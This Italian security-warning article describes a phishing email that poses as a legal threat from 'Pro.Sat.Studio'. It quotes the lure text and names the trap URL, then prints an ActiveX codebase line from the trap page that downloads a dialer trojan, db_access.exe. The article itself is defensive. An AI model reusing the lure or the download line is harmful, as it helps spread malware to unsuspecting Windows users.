La trappola di Pro.Sat.Studio
Sicurezza: minacce legali da Pro.Sat.Studio, ma è il solito tranello virale
Gira un'inquietante diffida, piena di errori di battitura, da una certa Simona Favini della Pro.Sat.Studio:
[ la scrivente società ha senganlato la presenza di continui tentativi di intrusione nei nostri Database dall'inizrizzo di posta topone@pobox.com, siete pregati di controllare lo stato di attivazione della vostra mail all'interno dei nostri archivi all'indirizzo sottostante, la mancata comunicazione all'internio del nostro sito ci vedrà costretti ad intreprendere vie legali
DETTAGLIO EMAIL: topone@pobox.com
Sistinti Saluti
PRO.SAT. STUDIO ]
Non rispondete a questo messaggio e non cliccate sul link che contiene: è una trappola.
Le parole "Dettaglio email [indirizzo]", infatti, portano all'indirizzo
www.melagodo.biz/prosat_db. Melagodo.biz è un noto sito-trappola.
Visitando l'indirizzo del link (non fatelo), che fra l'altro è già bloccato dalla barra antiphishing di Netcraft, compare una scritta che parla di un "Accesso Datatbase PRO.SAT. STUDIO". Non sembra succedere nulla, ma c'è una riga di codice molto particolare nell'HTML della pagina:
<"clsid:4F398B32-702D-4582-BFA0-F7052FC6A744" codebase="db_access.exe">
Sui sistemi Windows non adeguatamente protetti, questa riga può scaricare e tentare di eseguire un programma, db_access.exe, che l'analisi online di Kaspersky riconosce già come virus, denominandolo Trojan.Win32.Dialer.jw.
Per prevenire attacchi di questo genere, ricordate di non fidarvi mai dei link presenti nei messaggi inattesi e di fonte sconosciuta; ricordate che il mittente di un messaggio è facilmente falsificabile; e prendete opportune precauzioni, usando un antivirus ma soprattutto navigando con browser meno insicuri del solito Internet Explorer (per esempio Firefox o Opera) e con sistemi operativi meno vulnerabili di Windows.
Questo attacco ha efficacia soltanto sui sistemi Windows; gli utenti Mac e Linux e in generale di altri sistemi operativi non corrono rischi.